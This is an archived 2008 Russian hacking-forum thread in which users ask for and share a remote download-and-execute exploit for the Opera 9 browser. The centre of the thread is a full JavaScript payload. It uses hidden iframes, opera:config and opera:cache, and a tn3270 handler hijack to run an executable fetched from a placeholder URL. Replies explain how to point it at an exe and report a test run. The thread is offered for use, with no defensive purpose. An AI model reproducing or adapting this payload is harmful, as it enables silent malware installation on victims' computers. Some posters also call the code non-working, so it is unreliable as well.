Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Эксплойты для Opera (https://forum.antichat.xyz/showthread.php?t=57602)

-=[AL!EN]=- 06.01.2008 20:34

Эксплойты для Opera
 
Прошлую тему удалили модеры (не в том разделе видимо создал)
Тут его уже выкладывали, но видимо старую тему с ним уже дельнули, ищу еще раз експлоит для оперы 9 версии (remote download & execution)

SVAROG 10.01.2008 22:17

http://milw0rm.com/exploits/3871
http://milw0rm.com/exploits/3784
http://milw0rm.com/exploits/3101

-=[AL!EN]=- 10.01.2008 22:25

Спасибо, но к сожалению не то... Насколько помню выкладывали remote dwnld & execution...

razzzar 10.01.2008 22:32

Этот?
Код:

<script>
blank_iframe = document.createElement('iframe');
blank_iframe.src = 'about:blank';
blank_iframe.setAttribute('id', 'blank_iframe_window');
blank_iframe.setAttribute('style', 'display:none');
document.appendChild(blank_iframe);
blank_iframe_window.eval
        ("config_iframe = document.createElement('iframe');\
        config_iframe.setAttribute('id', 'config_iframe_window');\
        config_iframe.src = 'opera:config';\
        document.appendChild(config_iframe);\
        app_iframe = document.createElement('script');\
        cache_iframe = document.createElement('iframe');\
        app_iframe.src = 'http://path/to/exe';\
        app_iframe.onload = function ()\
        {\
                cache_iframe.src = 'opera:cache';\
                cache_iframe.onload = function ()\
                {\
                        cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
                        var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
                        filename = cache.match(re);\
                        config_iframe_window.eval\
                        (\"\
                        opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
                        app_link = document.createElement('a');\
                        app_link.setAttribute('href', 'tn3270://nothing');\
                        app_link.click();\
                        setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\
                        \");\
                };\
                document.appendChild(cache_iframe);\
        };\
        document.appendChild(app_iframe);");
</script>


-=[AL!EN]=- 10.01.2008 23:36

razzzar
это для 9й оперы? если да, то большое спс

razzzar 10.01.2008 23:52

Да, для 9ой.

[ }/{еСтоКий MAN ] 19.01.2008 18:33

хай. А как юзать этот эксплоит? можно пример?

mind 19.01.2008 18:46

Вот здесь видимо прописать путь к exe файлу:
Код:

app_iframe.src = 'http://path/to/exe';\
Не проверял, девятой оперы нема ((
DrWeb запалил сплоит )))

.::Gh0st::. 19.01.2008 18:59

залил на удаленный хост калькулятор, скачался. правда не запустился. проверял на опере 9.20

gibson 19.01.2008 19:07

сплойт не рабочий его нужно переписать. рабочий в привате.


Время: 21:15